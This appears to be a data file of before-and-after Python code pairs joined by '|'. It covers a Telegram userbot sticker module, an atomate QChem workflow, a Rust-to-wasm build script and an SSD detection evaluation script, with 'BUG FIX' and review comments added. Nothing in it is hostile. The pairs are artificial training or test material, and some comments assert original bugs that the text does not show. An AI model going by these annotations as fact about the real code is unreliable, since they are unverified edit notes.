                            await conv.send_file(file, force_document=True)
                        await conv.get_response()
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"`Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname})",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack does not exist yet: create a brand new one.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await args.edit(f"`Thanks Stikernya Bro hehe!`\
\n[Klik Disini!](t.me/addstickers/{packname}) Untuk Melihat Stiker Saya😄",
                                parse_mode='md')
async def resize_photo(photo):
    """Resize *photo* to fit Telegram's 512x512 sticker bound, preserving aspect ratio.

    Small images are upscaled so the larger side becomes 512; larger
    images are downscaled in place with ``Image.thumbnail``.
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    # BUG FIX: the original condition was `(image.width and image.height) < 512`,
    # which short-circuits to `image.height < 512` whenever width is non-zero,
    # so wide-but-short images were wrongly upscaled. Test both dimensions.
    if image.width < 512 and image.height < 512:
        size1 = image.width
        size2 = image.height
        if image.width > image.height:
            # Landscape: pin the width to 512 and scale the height.
            scale = 512 / size1
            size1new = 512
            size2new = size2 * scale
        else:
            # Portrait/square: pin the height to 512 and scale the width.
            scale = 512 / size2
            size1new = size1 * scale
            size2new = 512
        size1new = math.floor(size1new)
        size2new = math.floor(size2new)
        sizenew = (size1new, size2new)
        image = image.resize(sizenew)
    else:
        image.thumbnail(maxsize)
    return image
@register(outgoing=True, pattern="^\.stkrinfo$")
async def get_pack_info(event):
    """Reply-command .stkrinfo: show details of the replied sticker's pack."""
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    rep_msg = await event.get_reply_message()
    if not rep_msg.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        # Sticker metadata is expected in the document's second attribute.
        stickerset_attr = rep_msg.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(stickerset_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    # Fetch the full sticker set from Telegram by id + access hash.
    get_stickerset = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=stickerset_attr.stickerset.id,
                access_hash=stickerset_attr.stickerset.access_hash)))
    # Collect the distinct emojis used across the pack, preserving order.
    pack_emojis = []
    for document_sticker in get_stickerset.packs:
        if document_sticker.emoticon not in pack_emojis:
            pack_emojis.append(document_sticker.emoticon)
    OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
             f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
             f"**Official:** `{get_stickerset.set.official}`\n" \
             f"**Archived:** `{get_stickerset.set.archived}`\n" \
             f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
             f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
    await event.edit(OUTPUT)
@register(outgoing=True, pattern="^\.get$")
async def sticker_to_png(sticker):
    """Reply-command .get: re-send the replied sticker as a PNG document."""
    if not sticker.is_reply:
        await sticker.edit("`NULL information to fetch...`")
        return False
    img = await sticker.get_reply_message()
    if not img.document:
        await sticker.edit("`Reply to a sticker...`")
        return False
    try:
        # Probe the second document attribute; missing means not a sticker.
        img.document.attributes[1]
    except Exception:
        await sticker.edit("`This is not a sticker...`")
        return
    with io.BytesIO() as image:
        # Download the sticker into memory and re-upload it as a file.
        await sticker.client.download_media(img, image)
        image.name = 'sticker.png'
        image.seek(0)
        try:
            await img.reply(file=image, force_document=True)
        except Exception:
            await sticker.edit("`Err, can't send file...`")
        else:
            # Success: remove the triggering command message.
            await sticker.delete()
    return
# Register this module's help text under the "stickers" key.
# NOTE(review): the usage text still says "Reply .kang" while the registered
# command pattern is ".curry" — confirm which command name is intended.
CMD_HELP.update({
    "stickers":
    ">`.curry [emoji('s)]?`"
    "\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack "
    "\nor specify the emoji you want to."
    "\n\n>`.curry (emoji['s]]?` [number]?"
    "\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji "
    "or choose the emoji you want to."
    "\n\n>`.stkrinfo`"
    "\nUsage: Gets info about the sticker pack."
    "\n\n>`.get`"
    "\nUsage: reply to a sticker to get 'PNG' file of sticker."
})
|
# This module defines a workflow for FFopting a molecule and then analyzing its
# electron density critical points with Critic2.
from fireworks import Workflow
from atomate.qchem.fireworks.core import CubeAndCritic2FW, FrequencyFlatteningOptimizeFW
from atomate.utils.utils import get_logger
__author__ = "Samuel Blau"
__copyright__ = "Copyright 2019, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "11/20/19"
logger = get_logger(__name__)
def get_wf_FFopt_and_critic(
    molecule, suffix, qchem_input_params=None, db_file=">>db_file<<", **kwargs
):
    """
    Firework 1 : write QChem input for an FF optimization,
                 run FF_opt QCJob,
                 parse directory and insert into db,
                 pass relaxed molecule to fw_spec and on to fw2,

    Firework 2 : write QChem input for a single point calc to print a cube file,
                 run SP QCJob, thereby printing a cube file,
                 run Critic2 on the printed cube file,
                 parse directory and insert into db

    Args:
        molecule (Molecule): input molecule to be optimized and run.
        suffix (str): Workflow naming suffix
        qchem_input_params (dict): Specify kwargs for instantiating the input set
            parameters, e.g. dft_rung, basis_set, pcm_dielectric, scf_algorithm,
            or max_scf_cycles. See pymatgen/io/qchem/sets.py for defaults.
            The overwrite_inputs key allows directly modifying the rem, pcm, smd,
            and solvent dictionaries QChemDictSet passes to inputs.py, e.g.
            {"overwrite_inputs": {"rem": {"sym_ignore": "true"}}}.
        db_file (str): path to file containing the database credentials.
        kwargs (keyword arguments): additional kwargs to be passed to Workflow

    Returns:
        Workflow
    """
    qchem_input_params = qchem_input_params or {}
    # BUG FIX: the inner string literals below must not reuse the outer
    # f-string's quote character — that is a SyntaxError before Python 3.12.
    # FFopt
    fw1 = FrequencyFlatteningOptimizeFW(
        molecule=molecule,
        name=f"{molecule.composition.alphabetical_formula}:{'FFopt_' + suffix}",
        qchem_cmd=">>qchem_cmd<<",
        max_cores=">>max_cores<<",
        qchem_input_params=qchem_input_params,
        linked=True,
        db_file=">>db_file<<",
    )
    # Critic
    fw2 = CubeAndCritic2FW(
        name=f"{molecule.composition.alphabetical_formula}:{'CC2_' + suffix}",
        qchem_cmd=">>qchem_cmd<<",
        max_cores=">>max_cores<<",
        qchem_input_params=qchem_input_params,
        db_file=">>db_file<<",
        parents=fw1,
    )
    fws = [fw1, fw2]
    wfname = f"{molecule.composition.alphabetical_formula}:{'FFopt_CC2_WF_' + suffix}"
    return Workflow(fws, name=wfname, **kwargs)
| # This module defines a workflow for FFopting a molecule and then analyzing its
# electron density critical points with Critic2.
from fireworks import Workflow
from atomate.qchem.fireworks.core import CubeAndCritic2FW, FrequencyFlatteningOptimizeFW
from atomate.utils.utils import get_logger
__author__ = "Samuel Blau"
__copyright__ = "Copyright 2019, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "11/20/19"
logger = get_logger(__name__)
def get_wf_FFopt_and_critic(
    molecule, suffix, qchem_input_params=None, db_file=">>db_file<<", **kwargs
):
    """Build a two-Firework workflow: a frequency-flattening force-field
    optimization followed by a cube-file single point analyzed with Critic2.

    Firework 1 writes the QChem FFopt input, runs the job, parses the output
    into the database, and passes the relaxed molecule to Firework 2, which
    prints a cube file, runs Critic2 on it, and parses the results into the db.

    Args:
        molecule (Molecule): input molecule to be optimized and run.
        suffix (str): Workflow naming suffix.
        qchem_input_params (dict): kwargs for the QChem input set (dft_rung,
            basis_set, pcm_dielectric, scf_algorithm, max_scf_cycles, ...);
            see pymatgen/io/qchem/sets.py for defaults. The overwrite_inputs
            key allows direct edits to the rem/pcm/smd/solvent sections, e.g.
            {"overwrite_inputs": {"rem": {"sym_ignore": "true"}}}.
        db_file (str): path to file containing the database credentials.
        kwargs: additional keyword arguments forwarded to Workflow.

    Returns:
        Workflow
    """
    params = qchem_input_params or {}
    formula = molecule.composition.alphabetical_formula

    # Firework 1: frequency-flattening force-field optimization.
    ffopt_fw = FrequencyFlatteningOptimizeFW(
        molecule=molecule,
        name=f"{formula}:FFopt_{suffix}",
        qchem_cmd=">>qchem_cmd<<",
        max_cores=">>max_cores<<",
        qchem_input_params=params,
        linked=True,
        db_file=">>db_file<<",
    )
    # Firework 2: cube-file single point + Critic2, fed by the FFopt result.
    critic_fw = CubeAndCritic2FW(
        name=f"{formula}:CC2_{suffix}",
        qchem_cmd=">>qchem_cmd<<",
        max_cores=">>max_cores<<",
        qchem_input_params=params,
        db_file=">>db_file<<",
        parents=ffopt_fw,
    )
    return Workflow([ffopt_fw, critic_fw],
                    name=f"{formula}:FFopt_CC2_WF_{suffix}", **kwargs)
|
import itertools
import json
import logging
import os
import platform
import shutil
import subprocess
import textwrap
from argparse import ArgumentParser
from pathlib import Path
from subprocess import PIPE
def main() -> None:
    """Compile the given Rust build-dependencies (with proc-macro2 patched to
    dtolnay/watt) for the wasm32-unknown-unknown target and copy the resulting
    *.wasm artifacts into $OUT_DIR."""
    parser = ArgumentParser()
    parser.add_argument('--toolchain')
    parser.add_argument('--proc-macro2-rev', nargs='?', default=None)
    parser.add_argument('build_dependencies', nargs='+')
    args = parser.parse_args()
    logger = logging.getLogger()
    env = os.environ.copy()

    if args.toolchain:
        # Resolve cargo through rustup so the requested toolchain is used.
        rustup_exe = shutil.which('rustup')
        if rustup_exe is None:
            raise Exception('`rustup` not found')
        # NOTE(review): .decode() keeps the trailing newline from `rustup
        # which` — confirm whether env['CARGO'] should be stripped.
        env['CARGO'] = subprocess.run(
            [rustup_exe, 'which', 'cargo', '--toolchain', args.toolchain],
            stdout=PIPE, check=True,
        ).stdout.decode()
        cargo_command = [rustup_exe, 'run', args.toolchain, 'cargo']
    else:
        if Path(os.environ['CARGO']).stem != 'cargo':
            # CARGO may point at a wrapper binary; fall back to the sibling
            # `cargo` executable, or whatever is on PATH.
            cargo_exe = str(Path(os.environ['CARGO']).with_stem('cargo'))
            if not Path(cargo_exe).exists():
                which_cargo = shutil.which('cargo')
                if which_cargo is None:
                    raise Exception('`cargo` not found')
                cargo_exe = which_cargo
            # BUG FIX: the subscript string must not reuse the outer f-string
            # quote character (SyntaxError before Python 3.12).
            logger.warning(f'`{os.environ["CARGO"]}` → `{cargo_exe}`')
            env['CARGO'] = cargo_exe
        cargo_command = [env['CARGO']]

    workdir = cache_dir() / 'wattbuild'
    workdir.mkdir(parents=True, exist_ok=True)
    if args.proc_macro2_rev is None:
        rev = ''
    else:
        rev = f', rev = "{args.proc_macro2_rev}"'
    # Scratch crate whose [build-dependencies] are the crates to compile.
    manifest = textwrap.dedent(
        f'''\
        [workspace]
        [patch.crates-io]
        proc-macro2 = {{ git = "https://github.com/dtolnay/watt"{rev} }}
        [package]
        name = "wattbuild-build"
        version = "0.0.0"
        edition = "2018"
        [build-dependencies]
        '''
    )
    for i, value in enumerate(args.build_dependencies):
        manifest += f'_{i} = {value}\n'
    with open(workdir / 'Cargo.toml', 'w') as file:
        file.write(manifest)
    (workdir / 'src').mkdir(exist_ok=True)
    with open(workdir / 'src' / 'lib.rs', 'w') as file:
        file.write('')

    subprocess.run([*cargo_command, 'update'],
                   cwd=workdir, env=env, check=True)
    metadata = json.loads(subprocess.run(
        [*cargo_command, 'metadata', '--format-version', '1'],
        stdout=PIPE, cwd=workdir, env=env, check=True,
    ).stdout.decode())
    # Direct dependencies of the scratch crate are exactly the crates to build.
    node = next(node for node in metadata['resolve']['nodes']
                if node['id'] == metadata['resolve']['root'])
    build_dependencies = [package for package in metadata['packages']
                          if package['id'] in node['dependencies']]
    subprocess.run(
        [*cargo_command, 'build', '--release',
         *itertools.chain.from_iterable(
             # BUG FIX: inner subscripts use double quotes — reusing the outer
             # single quote is a SyntaxError before Python 3.12.
             ['-p', f'{package["name"]}:{package["version"]}']
             for package in build_dependencies
         ),
         '--target', 'wasm32-unknown-unknown'],
        stdout=PIPE, cwd=workdir, env=env, check=True,
    )
    for path in Path(metadata['target_directory'], 'wasm32-unknown-unknown',
                     'release').glob('*.wasm'):
        shutil.copy(path, os.environ['OUT_DIR'])
def cache_dir() -> Path:
    """Return the per-user cache directory for the current platform.

    Windows: %APPDATA%\\Local (or ~/AppData/Local); macOS: ~/Library/Caches;
    elsewhere: $XDG_CACHE_DIR or ~/.cache.
    """
    env = os.environ
    home = Path(os.path.expanduser('~'))
    system = platform.uname().system
    if system == 'Windows':
        # NOTE(review): uses APPDATA + 'Local'; LOCALAPPDATA may be the
        # intended variable — confirm before changing.
        return Path(env['APPDATA'], 'Local') if 'APPDATA' in env else home / 'AppData' / 'Local'
    if system == 'Darwin':
        return home / 'Library' / 'Caches'
    # NOTE(review): the XDG spec names this XDG_CACHE_HOME; this code reads
    # XDG_CACHE_DIR — kept as-is to preserve behavior.
    return Path(env['XDG_CACHE_DIR']) if 'XDG_CACHE_DIR' in env else home / '.cache'
# Script entry point: only run when executed directly, not on import.
if __name__ == '__main__':
    main()
| import itertools
import json
import logging
import os
import platform
import shutil
import subprocess
import textwrap
from argparse import ArgumentParser
from pathlib import Path
from subprocess import PIPE
def main() -> None:
    """Compile the given Rust build-dependencies (with proc-macro2 patched to
    dtolnay/watt) for the wasm32-unknown-unknown target and copy the resulting
    *.wasm artifacts into $OUT_DIR."""
    parser = ArgumentParser()
    parser.add_argument('--toolchain')
    parser.add_argument('--proc-macro2-rev', nargs='?', default=None)
    parser.add_argument('build_dependencies', nargs='+')
    args = parser.parse_args()
    logger = logging.getLogger()
    env = os.environ.copy()
    if args.toolchain:
        # Resolve cargo through rustup so the requested toolchain is used.
        rustup_exe = shutil.which('rustup')
        if rustup_exe is None:
            raise Exception('`rustup` not found')
        # NOTE(review): .decode() keeps the trailing newline from `rustup
        # which` — confirm whether env['CARGO'] should be stripped.
        env['CARGO'] = subprocess.run(
            [rustup_exe, 'which', 'cargo', '--toolchain', args.toolchain],
            stdout=PIPE, check=True,
        ).stdout.decode()
        cargo_command = [rustup_exe, 'run', args.toolchain, 'cargo']
    else:
        if Path(os.environ['CARGO']).stem != 'cargo':
            # CARGO may point at a wrapper binary; fall back to the sibling
            # `cargo` executable, or whatever is on PATH.
            cargo_exe = str(Path(os.environ['CARGO']).with_stem('cargo'))
            if not Path(cargo_exe).exists():
                which_cargo = shutil.which('cargo')
                if which_cargo is None:
                    raise Exception('`cargo` not found')
                cargo_exe = which_cargo
            logger.warning(f'`{os.environ["CARGO"]}` → `{cargo_exe}`')
            env['CARGO'] = cargo_exe
        cargo_command = [env['CARGO']]
    workdir = cache_dir() / 'wattbuild'
    workdir.mkdir(parents=True, exist_ok=True)
    if args.proc_macro2_rev is None:
        rev = ''
    else:
        rev = f', rev = "{args.proc_macro2_rev}"'
    # Scratch crate whose [build-dependencies] are the crates to compile.
    manifest = textwrap.dedent(
        f'''\
        [workspace]
        [patch.crates-io]
        proc-macro2 = {{ git = "https://github.com/dtolnay/watt"{rev} }}
        [package]
        name = "wattbuild-build"
        version = "0.0.0"
        edition = "2018"
        [build-dependencies]
        '''
    )
    for i, value in enumerate(args.build_dependencies):
        manifest += f'_{i} = {value}\n'
    with open(workdir / 'Cargo.toml', 'w') as file:
        file.write(manifest)
    (workdir / 'src').mkdir(exist_ok=True)
    with open(workdir / 'src' / 'lib.rs', 'w') as file:
        file.write('')
    subprocess.run([*cargo_command, 'update'],
                   cwd=workdir, env=env, check=True)
    metadata = json.loads(subprocess.run(
        [*cargo_command, 'metadata', '--format-version', '1'],
        stdout=PIPE, cwd=workdir, env=env, check=True,
    ).stdout.decode())
    # Direct dependencies of the scratch crate are exactly the crates to build.
    node = next(node for node in metadata['resolve']['nodes']
                if node['id'] == metadata['resolve']['root'])
    build_dependencies = [package for package in metadata['packages']
                          if package['id'] in node['dependencies']]
    subprocess.run(
        [*cargo_command, 'build', '--release',
         *itertools.chain.from_iterable(
             ['-p', f'{package["name"]}:{package["version"]}']
             for package in build_dependencies
         ),
         '--target', 'wasm32-unknown-unknown'],
        stdout=PIPE, cwd=workdir, env=env, check=True,
    )
    for path in Path(metadata['target_directory'], 'wasm32-unknown-unknown',
                     'release').glob('*.wasm'):
        shutil.copy(path, os.environ['OUT_DIR'])
def cache_dir() -> Path:
    """Return the per-user cache directory for the current platform.

    Windows: %APPDATA%\\Local (or ~/AppData/Local); macOS: ~/Library/Caches;
    elsewhere: $XDG_CACHE_DIR or ~/.cache.
    """
    env = os.environ
    home = Path(os.path.expanduser('~'))
    system = platform.uname().system
    if system == 'Windows':
        # NOTE(review): uses APPDATA + 'Local'; LOCALAPPDATA may be the
        # intended variable — confirm before changing.
        return Path(env['APPDATA'], 'Local') if 'APPDATA' in env else home / 'AppData' / 'Local'
    if system == 'Darwin':
        return home / 'Library' / 'Caches'
    # NOTE(review): the XDG spec names this XDG_CACHE_HOME; this code reads
    # XDG_CACHE_DIR — kept as-is to preserve behavior.
    return Path(env['XDG_CACHE_DIR']) if 'XDG_CACHE_DIR' in env else home / '.cache'
# Script entry point: only run when executed directly, not on import.
if __name__ == '__main__':
    main()
|
import torch
from vision.ssd.vgg_ssd import create_vgg_ssd, create_vgg_ssd_predictor
from vision.ssd.mobilenetv1_ssd import create_mobilenetv1_ssd, create_mobilenetv1_ssd_predictor
from vision.ssd.mobilenetv1_ssd_lite import create_mobilenetv1_ssd_lite, create_mobilenetv1_ssd_lite_predictor
from vision.ssd.squeezenet_ssd_lite import create_squeezenet_ssd_lite, create_squeezenet_ssd_lite_predictor
from vision.datasets.voc_dataset import VOCDataset
from vision.datasets.open_images import OpenImagesDataset
from vision.utils import box_utils, measurements
from vision.utils.misc import str2bool, Timer
from vision.datasets.piap_dataset import PIAPDataset
import argparse
import pathlib
import numpy as np
import logging
import sys
from vision.ssd.mobilenet_v2_ssd_lite import create_mobilenetv2_ssd_lite, create_mobilenetv2_ssd_lite_predictor
# Command-line interface for the SSD evaluation script.
parser = argparse.ArgumentParser(description="SSD Evaluation on VOC Dataset.")
parser.add_argument('--net', default="vgg16-ssd",
                    help="The network architecture, it should be of mb1-ssd, mb1-ssd-lite, mb2-ssd-lite or vgg16-ssd.")
parser.add_argument("--trained_model", type=str)
parser.add_argument("--dataset_type", default="voc", type=str,
                    help='Specify dataset type. Currently support voc and open_images.')
parser.add_argument("--dataset", type=str, help="The root directory of the VOC dataset or Open Images dataset.")
parser.add_argument("--label_file", type=str, help="The label file path.")
parser.add_argument("--use_cuda", type=str2bool, default=True)
parser.add_argument("--use_2007_metric", type=str2bool, default=True)
parser.add_argument("--nms_method", type=str, default="hard")
parser.add_argument("--iou_threshold", type=float, default=0.5, help="The threshold of Intersection over Union.")
parser.add_argument("--eval_dir", default="eval_results", type=str, help="The directory to store evaluation results.")
parser.add_argument('--mb2_width_mult', default=1.0, type=float,
                    help='Width Multiplifier for MobilenetV2')
args = parser.parse_args()
# Use the first CUDA device only when available and requested.
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() and args.use_cuda else "cpu")
def group_annotation_by_class(dataset):
    """Index ground-truth annotations by class and image.

    Args:
        dataset: object exposing ``__len__`` and ``get_annotation(i)`` which
            returns ``(image_id, (gt_boxes, classes, is_difficult))`` with
            numpy arrays.

    Returns:
        tuple: ``(true_case_stat, all_gt_boxes, all_difficult_cases)`` where
            true_case_stat maps class index -> count of non-difficult boxes,
            all_gt_boxes maps class -> image_id -> stacked (N, 4) tensor, and
            all_difficult_cases maps class -> image_id -> tensor of flags.
    """
    true_case_stat = {}
    all_gt_boxes = {}
    all_difficult_cases = {}
    for i in range(len(dataset)):
        image_id, annotation = dataset.get_annotation(i)
        gt_boxes, classes, is_difficult = annotation
        gt_boxes = torch.from_numpy(gt_boxes)
        # Use a distinct index name so the outer dataset index is not shadowed.
        for j, difficult in enumerate(is_difficult):
            class_index = int(classes[j])
            gt_box = gt_boxes[j]
            if not difficult:
                # Only non-difficult boxes count toward the recall denominator.
                true_case_stat[class_index] = true_case_stat.get(class_index, 0) + 1
            all_gt_boxes.setdefault(class_index, {}).setdefault(image_id, []).append(gt_box)
            all_difficult_cases.setdefault(class_index, {}).setdefault(image_id, []).append(difficult)
    for class_index in all_gt_boxes:
        for image_id in all_gt_boxes[class_index]:
            all_gt_boxes[class_index][image_id] = torch.stack(all_gt_boxes[class_index][image_id])
    for class_index in all_difficult_cases:
        for image_id in all_difficult_cases[class_index]:
            # BUG FIX: the original assigned this tensor into all_gt_boxes
            # (clobbering the stacked boxes) and never converted the
            # difficult flags.
            all_difficult_cases[class_index][image_id] = torch.tensor(
                all_difficult_cases[class_index][image_id])
    return true_case_stat, all_gt_boxes, all_difficult_cases
def compute_average_precision_per_class(num_true_cases, gt_boxes, difficult_cases,
                                        prediction_file, iou_threshold, use_2007_metric):
    """Compute one class's average precision from a VOC-style detection file.

    Args:
        num_true_cases (int): number of non-difficult ground-truth boxes.
        gt_boxes (dict): image_id -> tensor of ground-truth boxes.
        difficult_cases (dict): image_id -> per-box difficult flags.
        prediction_file: path to lines of "image_id score x1 y1 x2 y2"
            with 1-based (MATLAB-style) coordinates.
        iou_threshold (float): minimum IoU for a detection to match a gt box.
        use_2007_metric (bool): use the VOC2007 11-point interpolated AP.

    Returns:
        The average precision as computed by the measurements helper.
    """
    with open(prediction_file) as f:
        image_ids = []
        boxes = []
        scores = []
        for line in f:
            t = line.rstrip().split(" ")
            image_ids.append(t[0])
            scores.append(float(t[1]))
            box = torch.tensor([float(v) for v in t[2:]]).unsqueeze(0)
            box -= 1.0  # convert to python format where indexes start from 0
            boxes.append(box)
        # Rank detections by descending confidence before greedy matching.
        scores = np.array(scores)
        sorted_indexes = np.argsort(-scores)
        boxes = [boxes[i] for i in sorted_indexes]
        image_ids = [image_ids[i] for i in sorted_indexes]
        true_positive = np.zeros(len(image_ids))
        false_positive = np.zeros(len(image_ids))
        matched = set()  # (image_id, gt_index) pairs already claimed by a detection
        for i, image_id in enumerate(image_ids):
            box = boxes[i]
            if image_id not in gt_boxes:
                false_positive[i] = 1
                continue
            gt_box = gt_boxes[image_id]
            ious = box_utils.iou_of(box, gt_box)
            max_iou = torch.max(ious).item()
            max_arg = torch.argmax(ious).item()
            if max_iou > iou_threshold:
                if difficult_cases[image_id][max_arg] == 0:
                    if (image_id, max_arg) not in matched:
                        true_positive[i] = 1
                        matched.add((image_id, max_arg))
                    else:
                        # Duplicate detection of an already-matched gt box.
                        false_positive[i] = 1
                # Matches to difficult boxes count as neither TP nor FP.
            else:
                false_positive[i] = 1
    true_positive = true_positive.cumsum()
    false_positive = false_positive.cumsum()
    precision = true_positive / (true_positive + false_positive)
    recall = true_positive / num_true_cases
    if use_2007_metric:
        return measurements.compute_voc2007_average_precision(precision, recall)
    else:
        return measurements.compute_average_precision(precision, recall)
if __name__ == '__main__':
    eval_path = pathlib.Path(args.eval_dir)
    eval_path.mkdir(exist_ok=True)
    timer = Timer()
    class_names = [name.strip() for name in open(args.label_file).readlines()]

    # Build the evaluation dataset.
    if args.dataset_type == "voc":
        dataset = VOCDataset(args.dataset, is_test=True)
    elif args.dataset_type == 'open_images':
        dataset = OpenImagesDataset(args.dataset, dataset_type="test")
    # BUG FIX: `else <expr>:` is a SyntaxError — this branch must be an elif,
    # with a real else below to reject unknown dataset types.
    elif args.dataset_type == 'piap':
        dataset = PIAPDataset(args.dataset, is_test=True)
    else:
        logging.fatal("The dataset type is wrong. It should be one of voc, open_images and piap.")
        parser.print_help(sys.stderr)
        sys.exit(1)
    true_case_stat, all_gb_boxes, all_difficult_cases = group_annotation_by_class(dataset)

    # Instantiate the requested network architecture.
    if args.net == 'vgg16-ssd':
        net = create_vgg_ssd(len(class_names), is_test=True)
    elif args.net == 'mb1-ssd':
        net = create_mobilenetv1_ssd(len(class_names), is_test=True)
    elif args.net == 'mb1-ssd-lite':
        net = create_mobilenetv1_ssd_lite(len(class_names), is_test=True)
    elif args.net == 'sq-ssd-lite':
        net = create_squeezenet_ssd_lite(len(class_names), is_test=True)
    elif args.net == 'mb2-ssd-lite':
        net = create_mobilenetv2_ssd_lite(len(class_names), width_mult=args.mb2_width_mult, is_test=True)
    else:
        logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
        parser.print_help(sys.stderr)
        sys.exit(1)

    timer.start("Load Model")
    net.load(args.trained_model)
    net = net.to(DEVICE)
    # BUG FIX: the inner string must not reuse the outer f-string quote
    # (SyntaxError before Python 3.12).
    print(f'It took {timer.end("Load Model")} seconds to load the model.')

    # Wrap the network in the matching predictor (decoding + NMS).
    if args.net == 'vgg16-ssd':
        predictor = create_vgg_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb1-ssd':
        predictor = create_mobilenetv1_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb1-ssd-lite':
        predictor = create_mobilenetv1_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'sq-ssd-lite':
        predictor = create_squeezenet_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb2-ssd-lite':
        predictor = create_mobilenetv2_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    else:
        logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
        parser.print_help(sys.stderr)
        sys.exit(1)

    # Run detection over the whole dataset, accumulating one row per box:
    # [image_index, label, score, x1, y1, x2, y2].
    results = []
    for i in range(len(dataset)):
        print("process image", i)
        timer.start("Load Image")
        image = dataset.get_image(i)
        print("Load Image: {:4f} seconds.".format(timer.end("Load Image")))
        timer.start("Predict")
        boxes, labels, probs = predictor.predict(image)
        print("Prediction: {:4f} seconds.".format(timer.end("Predict")))
        indexes = torch.ones(labels.size(0), 1, dtype=torch.float32) * i
        results.append(torch.cat([
            indexes.reshape(-1, 1),
            labels.reshape(-1, 1).float(),
            probs.reshape(-1, 1),
            boxes + 1.0  # matlab's indexes start from 1
        ], dim=1))
    results = torch.cat(results)

    # Write per-class detection files in the VOC submission format.
    for class_index, class_name in enumerate(class_names):
        if class_index == 0:
            continue  # ignore background
        prediction_path = eval_path / f"det_test_{class_name}.txt"
        with open(prediction_path, "w") as f:
            sub = results[results[:, 1] == class_index, :]
            for i in range(sub.size(0)):
                prob_box = sub[i, 2:].numpy()
                image_id = dataset.ids[int(sub[i, 0])]
                print(
                    image_id + " " + " ".join([str(v) for v in prob_box]),
                    file=f
                )

    aps = []
    print("\n\nAverage Precision Per-class:")
    for class_index, class_name in enumerate(class_names):
        if class_index == 0:
            continue
        prediction_path = eval_path / f"det_test_{class_name}.txt"
        ap = compute_average_precision_per_class(
            true_case_stat[class_index],
            all_gb_boxes[class_index],
            all_difficult_cases[class_index],
            prediction_path,
            args.iou_threshold,
            args.use_2007_metric
        )
        aps.append(ap)
        print(f"{class_name}: {ap}")

